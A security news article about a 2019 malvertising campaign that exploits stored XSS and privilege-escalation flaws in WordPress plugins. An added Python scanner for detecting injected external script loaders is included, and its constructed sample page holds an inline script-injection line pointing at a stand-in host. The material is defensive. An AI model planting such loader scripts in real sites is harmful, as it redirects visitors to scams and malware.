Malvertising campaign exploits recently disclosed WordPress Plugin flaws

Pierluigi Paganini July 24, 2019

Experts at Defiant have uncovered a campaign that exploited recently disclosed plugin vulnerabilities to inject malware into websites.

Experts at Defiant, the company that developed the Wordfence security plugin for WordPress, uncovered a malvertising campaign that leverages recently disclosed plugin flaws to inject malicious code into websites.

Threat actors behind the malvertising campaign are leveraging known flaws in WordPress plugins such as “Coming Soon and Maintenance Mode,” “Yellow Pencil Visual CSS Style Editor” and “Blog Designer.”

Experts pointed out that these plugins are installed on thousands of websites.

The attackers inject a small piece of JavaScript code that is designed to fetch additional code from an external domain and execute it every time visitors browse to the compromised website.

“The Defiant Threat Intelligence team has identified a malvertising campaign which is causing victims’ sites to display unwanted popup ads and redirect visitors to malicious destinations, including tech support scams, malicious Android APKs, and sketchy pharmaceutical ads.” states the report published by Wordfence. “By targeting a few recently disclosed WordPress plugin vulnerabilities, the attackers inject a JavaScript payload into the front end of a victim’s site. These injections each contain a short script which sources additional code from one or more third-party URLs. That code is executed when a visitor opens the victim website.”
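The injection described in the report is a short script in a site's front end that pulls additional code from a third-party host. The following added example (not code from the article or from Wordfence) is a small scanner a site owner can run over a saved copy of a page's HTML to surface exactly that pattern: `<script src>` tags and inline loaders that point at hosts outside the site itself and an allowlist. All hostnames and the sample page are constructed.

```python
"""Flag front-end scripts that load code from third-party hosts (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline snippets that build a <script> element or assign a .src are loaders.
_LOADER_HINT = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)|\.src\s*=", re.I)
_QUOTED_URL = re.compile(r"""['"]((?:https?:)?//[^'"\s]+)['"]""")


class _ScriptCollector(HTMLParser):
    """Collects src= values of <script> tags and bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script = True  # body arrives via handle_data

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def find_external_loaders(html, site_host, allowlist=()):
    """Return sorted hostnames, outside site_host/allowlist, that scripts load from."""
    trusted = {site_host.lower(), *(h.lower() for h in allowlist)}
    parser = _ScriptCollector()
    parser.feed(html)
    candidates = list(parser.srcs)
    for body in parser.inline:
        if _LOADER_HINT.search(body):          # only bodies that act as loaders
            candidates.extend(_QUOTED_URL.findall(body))
    hosts = set()
    for url in candidates:
        host = urlparse(url).hostname          # relative paths give None (same site)
        if host and host.lower() not in trusted:
            hosts.add(host.lower())
    return sorted(hosts)


# Constructed sample page: one allowed CDN, one inline loader, one injected tag.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://cdn.allowed.example/lib.js"></script></head><body><p>Hi</p>
<script>var s=document.createElement('script');s.src='//injected-loader.example/a.js';document.head.appendChild(s);</script>
<script src="https://second-loader.example/x.js"></script></body></html>"""

if __name__ == "__main__":
    print(find_external_loaders(SAMPLE_PAGE, "victim.example", ("cdn.allowed.example",)))
```

Run it against HTML fetched as a logged-out visitor, since the injected payload fires on the public front end rather than in the admin dashboard.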


Victims are first redirected to a domain that checks the type of device they are using; the malicious code then redirects them to malicious destinations, including tech support scams, sites delivering malicious Android APKs, and sketchy pharmaceutical ads.

The hackers have exploited stored cross-site scripting (XSS) vulnerabilities in Blog Designer and Coming Soon and Maintenance Mode, and an unauthenticated arbitrary options update issue in the Yellow Pencil plugin.

“The Yellow Pencil vulnerability is notable because, in most configurations, an attacker could enable new user registrations with Administrator privileges, leading to takeover of vulnerable sites. Instead of taking the sites over entirely, these attackers seem satisfied with the malvertising campaign by itself.” continues the report.

The experts revealed that the privilege escalation vulnerability in the Yellow Pencil Visual Theme Customizer plugin was exploited in a hacking campaign in April. The flaw could be exploited by attackers to update arbitrary options on vulnerable installations.

Experts at Wordfence observed a high volume of attempts to exploit the vulnerability after a security researcher publicly disclosed proof-of-concept (PoC) exploit code for two vulnerabilities affecting the plugin.

The privilege-escalation vulnerability exists in the yellow-pencil.php file. The file checks whether the request parameter yp_remote_get has been set and, if it has, the plugin escalates the user’s privileges to those of an administrator.

An unauthenticated user could therefore operate with administrator privileges, for example by changing arbitrary options.

“The majority of the XSS injection attempts tracked across this campaign were sent by IP addresses linked to popular hosting providers,” concludes the report. “With attacks sourced from IPs hosting several live websites, as well as our own evidence of infected sites associated with this campaign, it’s likely the threat actor is using infected sites to deliver XSS attacks by proxy.”

The researchers shared Indicators of Compromise and other technical details about this malvertising campaign in their analysis.


Pierluigi Paganini

(SecurityAffairs – malvertising campaign, WordPress)
